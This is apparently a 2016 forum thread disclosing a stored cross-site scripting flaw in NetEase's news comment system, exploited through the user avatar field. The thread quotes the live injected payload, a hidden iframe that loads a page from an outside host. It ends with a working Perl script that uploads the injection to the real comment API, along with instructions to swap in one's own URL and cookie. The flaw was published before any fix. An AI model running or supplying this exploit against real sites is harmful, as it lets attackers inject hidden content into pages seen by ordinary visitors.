网易的评论系统有漏洞了吧！

刚才访问： http://sports.163.com/16/0618/11/BPRCO3DM00051CA1.html#p=BMVOG5U20AI90005

会自动跳转到： http://52track.com:94/ （美国地址）

现在不跳转了，但还是会调入： http://chatp.jordan2u.com/23/test.php 这个 url 。（美国地址）

开始有些奇怪，后来查了一下代码，发现问题在这个 url ： http://sdk.comment.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/threads/BPRCO3DM00051CA1/comments/hotList?offset=0&limit=3&showLevelThreshold=70&headLimit=1&tailLimit=2&ibc=jssdk&callback=tool1009691620930263987_1466248158686&_=1466248158687

该 url 的内容：

tool1009691620930263987_1466248158686( {"commentIds":["2418735840","2418735840,2418825858","2418910814"],"comments":{"2418735840":{"against":11,"anonymous":false,"buildLevel":1,"commentId":2418735840,"content":"葛格利亚才是贤母的典范！","createTime":"2016-06-18 11:59:06","favCount":0,"ip":"115.193..","isDel":false,"postId":"BPRCO3DM00051CA1_2418735840","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://imgm.ph.126.net/_sStRF4UCYz2gI5hzRrXpg==/6630565288886574327.jpg","id":"NTU5ZjYwMGVjMmQxYjQyNDY1MjhiZGU5OTBlYWQwYjdAdGVuY2VudC4xNjMuY29t","label":"[{"endTime":"1447629212974","startTime":"1447542812973","tagKey":"100"},{"endTime":"1441987817968","startTime":"1441901417967","tagKey":"101"},{"endTime":"1446868704041","startTime":"1446782304040","tagKey":"102"},{"endTime":"1442202823801","startTime":"1442116423800","tagKey":"103"},{"endTime":"1442095939822","startTime":"1442009539822","tagKey":"104"},{"endTime":"1447616152210","startTime":"1447529752210","tagKey":"105"}]","location":"浙江省杭州市","nickname":"詹跑跑","userId":63025043,"vipInfo":"vipt"},"vote":1050},"2418825858":{"against":15,"anonymous":false,"buildLevel":2,"commentId":2418825858,"content":"看到满屏黑狗真来火了，来做个统计詹姆斯爷们篮球，库里娘炮篮球！本人 02 詹迷 168 身高 88kg 吹牛被雷劈！","createTime":"2016-06-18 12:04:28","favCount":0,"ip":"120.42..","isDel":false,"postId":"BPRCO3DM00051CA1_2418825858","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="<a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>.","isDel":false,"postId":"BPRCO3DM00051CA1_2418910814","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://mimg.126.net/p/butter/1008031648/img/face_big.gif","id":"Y2NibG5sd0AxNjMuY29t","location":"辽宁省沈阳市","nickname":"红黑色的梦想","userId":543741},"vote":739}}});

看 url 应该是评论系统，被插入了一条恶意评论，导致 json 解析错误。然后插入了一个 iframe 。

网易抓紧自查一下吧，现在人家还在继续实验呢！

alexecn

2016-06-18 20:15:25 +08:00

继续的分析了一下。看上面的 json 代码，应该是 avatar 字段的问题，也就是上传用户头像的部分，用户指定上传的 url 地址没有做检查，所以恶意用户上传了一段： http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="<a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow noopener">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow noopener">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>.
作为他的头像地址。

而网易这个评论系统在显示的时候，对这段从数据库里提取的代码也没有做检查，导致了这个漏洞的生效。

alexecn

2016-06-19 00:10:20 +08:00

还有人等着看吗？？刚才出去吃了个肉串喝了点酒。看来网易反应比较慢，都放出来，让他们好好自查吧！

漏洞入口，就在上传头像的地方。： http://tie.163.com/setting/avatar/

原理：搞球啊！上传了头像文件之后，服务器返回了一个头像文件的地址，然后这个地址竟然要客户的浏览器再去提交到内部的 API 。要我是你们项目经理，就骂死你们！内部的 Http API 不是这么用的！

代码：
use strict;
our $VERSION=0.1;

use Data::Dumper;
use AnyEvent;

use JSON::XS;

use AnyEvent::HTTP;

my $cvar = AnyEvent->condvar;
my $url='http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users?&ibc=newspc';

my $ss=qq|http://img5.cache.netease.com/tie/images/noface80_80.png "><iframe src="http://xx.xxxx.com/xxx.php" style="display:none"></iframe>.|;
warn encode_json({avatar=>$ss});

http_request
PUT => $url,
headers => { "user-agent" => "OPener 1.0",'Content-Type'=>'application/json', "Cookie"=>''},
body=> encode_json({avatar=>$ss}),
timeout => 30,
sub {
my ($body, $hdr) = @_;
warn $body;
return 1;
};

$cvar->recv;

$url 自己修改一下，还有 Cookie 自己改一下，就可以上传了。

网易抓紧吧！